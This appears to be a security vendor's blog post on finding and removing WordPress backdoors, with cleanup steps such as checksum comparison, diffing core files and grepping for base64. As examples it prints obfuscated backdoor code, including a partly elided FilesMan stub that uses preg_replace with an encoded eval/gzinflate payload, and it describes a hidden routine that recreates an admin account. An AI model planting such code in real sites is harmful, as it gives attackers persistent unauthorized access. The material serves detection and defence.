WordPress backdoor hack featured image

What is WordPress Backdoor?

Thousands of WordPress sites are infected every year and the number is increasing. These hacked websites are then used to spread fraud and spam. Often the owners and developers may be unaware about the infection. The infection may be persistent or not. Thus, a WordPress backdoor helps to maintain that persistence. A WordPress backdoor is the code which allows an attacker unauthorized and persistent access to the server. Often it is a malicious file hidden somewhere. Or at times it can be an infected plugin. New variants of WordPress backdoor hack can be found every month.

Hackers are always at play trying to inject WordPress backdoor. There have been multiple plugins over the years used to spread infection. Therefore, the threat could be from anywhere. Later on, it can be a time and resource consuming process to remove WordPress backdoors. However preventive measures can always control the damage. A secure WordPress site can delay the attack if not prevent. We will see more about finding and fixing a WordPress backdoor in this blog.

What leads to a WordPress Backdoor Hack?

Setting up a WordPress site is reasonably comfortable. But multiple loopholes can pave way for a WordPress backdoor. So, for simplicity, we can narrow it down to the prime few. These are:

  • At times it could be due to a buggy plugin or a theme.
  • Login credentials to your site may be weak or default.
  • File permissions may be weak exposing sensitive files.
  • Not using a firewall or some sort of security solution.
  • Installations may be outdated.
  • Sharing an infected server with other websites. Ask your service provider for subnetting.

Finding WordPress Backdoor

Locating WordPress Backdoor in Themes

Inactive themes are the best place to hide a WordPress backdoor. Hackers are aware of this fact and often look for such themes in your site. The reason being you are less likely to check there as it is inactive. WP Themes contains a critical file called functions.php. This file is responsible for calling native PHP, WordPress, and other functions. So in simple words, it can be used to perform any kind of operation. Often attackers try to inject this file for obtaining a WordPress backdoor. One such example is given in the image below.

WordPress backdoor malicious code

This is a malicious code in the file functions.php. It is triggered when the attacker visits  URL.www.yoursite.com/wp-includes/registration.php So, then this function creates a new user with

id: backdooradmin

password: Pa55W0rd.

Thus, even if you delete the user it can be created again by visiting this URL. This is a typical example of a WordPress backdoor. However, this code can be injected only by gaining access to the server first. It could be using an open FTP port or other loopholes.

Worried about Backdoors in WordPress? Drop us a message on the chat widget and we’d be happy to help you fix it. Secure my WordPress website now.

Locating WordPress Backdoor in Plugins

A WordPress backdoor hack is often due to buggy plugins. Multiple plugins have been found buggy over the years. This year the latest one was the Contact form 7. There are more than 5 million active users of this plugin. In contrast, the bug led to a privilege escalation. When plugin files are modified, it may not be visible on the Dashboard. However, an FTP search can reveal such files. Further to make it look legitimate, backdoor files are named as help files. The reasons backdoors are found in plugins are:

  • Unused plugins are more likely to be infected. Only because they can hide backdoors for long.
  • Untrusted and unpopular plugins are often poorly coded. Thus increasing the chances of a WordPress backdoor hack.
  • Outdated plugins are more likely to be the target. Just because many are still running them without updating.
  • These buggy plugins can help in modifying other core files.

Therefore lookout for any unknown plugins. Clean all the unused plugins!

Locating WordPress backdoor in installation files

Modifying core files comes next after the plugin is infected. There may be rogue code in base files or new files may appear. At times the backdoor may look gibberish like this here:

$t43="l/T6\\:aAcNLn#?rP}1\rG_ -s`SZ\$58t\n7E{.*]ixy3h,COKR2dW[0!U\tuQIHf4bYm>wFz<=DqV@&(BjX'~|ge%p+oMJv^);\"k9";
$GLOBALS['ofmhl60'] = ${$t43[20].$t43

This code is obfuscated using known techniques. Thus making it harder for human users to read. So, look out for such fishy looking code and remove the files containing it. At times the backdoor may also present itself as a legitimate file like xml.php, media.php, plugin.php etc. So don’t skip any file even if looks legitimate. Moreover, there are other techniques to make code difficult to read.

Also, look out for the keyword FilesMan in your files. For instance, this is the dump of infamous backdoor  Filesman:02. This backdoor is hard to detect and not visible in logs. It is used to steal passwords and other details.

<?php
$auth_pass = "";
$color = "#df5";
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","x65x76x61x6Cx28x67x7Ax69x6Ex66x6Cx61x74x65x28x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/t..NRCty4s8Uh1VQKxLg+xQC0T93+IV4sxw/c08okR1wKtoyadLX6Dl6tDg3WxVxFoHhkj6Yn/xc='x29x29x29x3B",".");
?>

For instance, the code in the 6th line is in the hex form. When converted it would look something like: preg_replace("/.*/e","eval(gzinfla\. There are tools available online to decode hex characters. Use them! Also, the attacker can hide code using base64 encoding. So treat it similarly.  Here the keyword FilesMan is present in the 4th line. Such variants of this infection have this keyword. At times it is possible that the code may be tampering with sensitive files like .htaccess. So ensure to take a good look through these!

How to Fix WordPress Backdoor Hack?

Comparing Checksum

The first step is to compare the checksums. It is a heuristic determination of file integrity. Manual inspection can be done. Moreover, there are automatic tools available freely for this purpose. Not only for core files, but checksums are also available for plugins and themes too. Moreover, you can maintain a personal blacklist. This can be done using lists available in the public domain. After the checksums do not match proceed to manually to remove WordPress backdoors.

Need professional help to remove WordPress Backdoors? Drop us a message on the chat widget and we’d be happy to help you. Fix my WordPress website now.

Core Files Integrity

Secondly, after files show up different checksum values inspect them manually. It is very likely that WordPress backdoor hack would have tampered files. Thus, the integrity of installation files can be verified. Begin by downloading a fresh copy of WordPress.

$ mkdir WordPress

$ cd WordPress

This command created a directory named WordPress and switched over to that.

$ wget https://github.com/WordPress/WordPress/archive/4.9.8.zip 

$ tar -zxvf 4.9.8.zip

Now download the latest version of WordPress (4.9.8 in this case) using the first line of code. The second line then extracts it. After completing these tasks, comes the critical step. $ diff -r path/to/your/file.php /Wordpress/wp-cron.php. This code compares the difference between the two files. Since the WordPress backdoor would have edited your files, this will show the changes. However, a few files are dynamic like the xmlrpc.php. This file helps users and services to interact with the site through RPC. Hackers know this and often try to hide backdoor here. So check this thoroughly to find and remove WordPress backdoors.

Encodings

At times files may show modified but may be unreadable to you. Then, you can begin the WordPress backdoor hack cleanup by looking for base64 encodings. This is where the grep command can do the wonders. Use the following command:

find . -name "*.php" -exec grep "base64"'{}'\; -print &> output.txt

This command will neatly list all base64 detections in output.txt. From here on you can decode it to plaintext using online tools. Also, if you wish to search in files other than .php just replace the word *.php in code. Moreover, the malicious code could be in hex format too. So you could use grep -Pr "[\x01\x02\x03]". For other similar encodings repeat this step. Delete these files or lines of malicious code to remove WordPress backdoors.

Using Server Logs

The server logs can help to remove WordPress backdoors. Firstly, you need to see which files have been edited after a specific date. Also, go through the FTP logs to see the IPs used to connect to your server. Keep a tab on recently edited files. Moreover look out for the image folder. No one expects executables to be present in images folders. Furthermore, the image folder may be writable. That’s why hackers love to hide backdoors there. Also, ensure that permissions are appropriate for sensitive files. Thus set your file permissions to 444 (r–r–r–) or maybe 440 (r–r—–).  See specifically for any changes in the images folder.

Update and Backup

The importance of updating your WordPress website has been emphasized over and over. An outdated installation is as good as an infected one.

If you are unable to trace the cause of WordPress backdoor hack, restore it from backup, only after taking the current site backup & then compare the two.

If you don’t have an existing backup and want to replace core WordPress files with the fresh ones. For that, you need to update your WordPress website manually after taking the current site backup.

Moreover, if any vulnerability is reported with the plugins you use, it is recommended to update them immediately. If the patch is taking too long then replace it with the alternatives. It is recommended to stay updated with official blogs to get patches at earliest.

Use WordPress Backdoor Scanner

Humans are prone to errors. Manually inspecting is tedious and prone to errors. It may cause WordPress backdoor hack to reoccur. So the solution to this is automation. There are pretty advanced tools available in the market today. These scanners can detect and remove WordPress backdoors. One such is the Astra malware cleaner. Not only will it clean your website but protect if from future infections. It is reasonably priced and gives you a comprehensive view. It would save your precious resources and time!

Waiting to Get Hacked?

Get security tips & latest vulnerability fixes right in your inbox:

About The Author

A computer nerd. Loves working with Sqlmap and BeEF (the software) ;) Has experience in wireless pen tests. Owns a chatbot on Pandorabots named Mark1. In free time he can be found saving some goals.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Close